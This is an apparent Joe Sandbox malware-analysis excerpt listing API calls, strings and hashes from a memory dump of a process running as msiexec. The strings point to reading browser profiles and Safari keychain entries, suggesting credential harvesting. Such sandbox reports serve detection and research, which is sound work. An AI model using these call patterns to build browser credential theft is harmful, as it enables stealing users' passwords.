                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: free
                                                                                • String ID:
                                                                                • API String ID: 1294909896-0
                                                                                • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                                APIs
                                                                                • EmptyClipboard.USER32 ref: 004098EC
                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                • GetLastError.KERNEL32 ref: 0040995D
                                                                                • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                • GetLastError.KERNEL32 ref: 00409974
                                                                                • CloseClipboard.USER32 ref: 0040997D
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                • String ID:
                                                                                • API String ID: 3604893535-0
                                                                                • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Library$AddressFreeLoadMessageProc
                                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                • API String ID: 2780580303-317687271
                                                                                • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                APIs
                                                                                • EmptyClipboard.USER32 ref: 00409882
                                                                                • wcslen.MSVCRT ref: 0040988F
                                                                                • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                • CloseClipboard.USER32 ref: 004098D7
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                • String ID:
                                                                                • API String ID: 1213725291-0
                                                                                • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                APIs
                                                                                • GetLastError.KERNEL32 ref: 004182D7
                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                • LocalFree.KERNEL32(?), ref: 00418342
                                                                                • free.MSVCRT ref: 00418370
                                                                                  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                                  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                • String ID: OsError 0x%x (%u)
                                                                                • API String ID: 2360000266-2664311388
                                                                                • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                APIs
                                                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                • OpenClipboard.USER32(?), ref: 00411878
                                                                                • GetLastError.KERNEL32 ref: 0041188D
                                                                                  • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                                  • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                  • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                  • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                  • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                  • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                  • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                  • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                                  • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Clipboard$FileGlobal$CloseTemp$AllocDataDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                                                • String ID:
                                                                                • API String ID: 2628231878-0
                                                                                • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                                                                • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@??3@memcpymemset
                                                                                • String ID:
                                                                                • API String ID: 1865533344-0
                                                                                • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                APIs
                                                                                • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Version
                                                                                • String ID:
                                                                                • API String ID: 1889659487-0
                                                                                • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                APIs
                                                                                • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: NtdllProc_Window
                                                                                • String ID:
                                                                                • API String ID: 4255912815-0
                                                                                • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                APIs
                                                                                • _wcsicmp.MSVCRT ref: 004022A6
                                                                                • _wcsicmp.MSVCRT ref: 004022D7
                                                                                • _wcsicmp.MSVCRT ref: 00402305
                                                                                • _wcsicmp.MSVCRT ref: 00402333
                                                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                • memset.MSVCRT ref: 0040265F
                                                                                • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                • API String ID: 577499730-1134094380
                                                                                • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                • String ID: :stringdata$ftp://$http://$https://
                                                                                • API String ID: 2787044678-1921111777
                                                                                • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                • GetDC.USER32 ref: 004140E3
                                                                                • wcslen.MSVCRT ref: 00414123
                                                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                • _snwprintf.MSVCRT ref: 00414244
                                                                                • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                • String ID: %s:$EDIT$STATIC
                                                                                • API String ID: 2080319088-3046471546
                                                                                • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                APIs
                                                                                • EndDialog.USER32(?,?), ref: 00413221
                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                • memset.MSVCRT ref: 00413292
                                                                                • memset.MSVCRT ref: 004132B4
                                                                                • memset.MSVCRT ref: 004132CD
                                                                                • memset.MSVCRT ref: 004132E1
                                                                                • memset.MSVCRT ref: 004132FB
                                                                                • memset.MSVCRT ref: 00413310
                                                                                • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                • memset.MSVCRT ref: 004133C0
                                                                                • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                • wcscpy.MSVCRT ref: 0041341F
                                                                                • _snwprintf.MSVCRT ref: 0041348E
                                                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                • SetFocus.USER32(00000000), ref: 004134B7
                                                                                Strings
                                                                                • {Unknown}, xrefs: 004132A6
                                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                • API String ID: 4111938811-1819279800
                                                                                • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                • EndDialog.USER32(?,?), ref: 0040135E
                                                                                • DeleteObject.GDI32(?), ref: 0040136A
                                                                                • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                • ShowWindow.USER32(00000000), ref: 00401398
                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                • String ID:
                                                                                • API String ID: 829165378-0
                                                                                • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00404172
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                • wcscpy.MSVCRT ref: 004041D6
                                                                                • wcscpy.MSVCRT ref: 004041E7
                                                                                • memset.MSVCRT ref: 00404200
                                                                                • memset.MSVCRT ref: 00404215
                                                                                • _snwprintf.MSVCRT ref: 0040422F
                                                                                • wcscpy.MSVCRT ref: 00404242
                                                                                • memset.MSVCRT ref: 0040426E
                                                                                • memset.MSVCRT ref: 004042CD
                                                                                • memset.MSVCRT ref: 004042E2
                                                                                • _snwprintf.MSVCRT ref: 004042FE
                                                                                • wcscpy.MSVCRT ref: 00404311
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                • API String ID: 2454223109-1580313836
                                                                                • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                APIs
                                                                                  • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                • API String ID: 4054529287-3175352466
                                                                                • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                • API String ID: 3143752011-1996832678
                                                                                • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                APIs
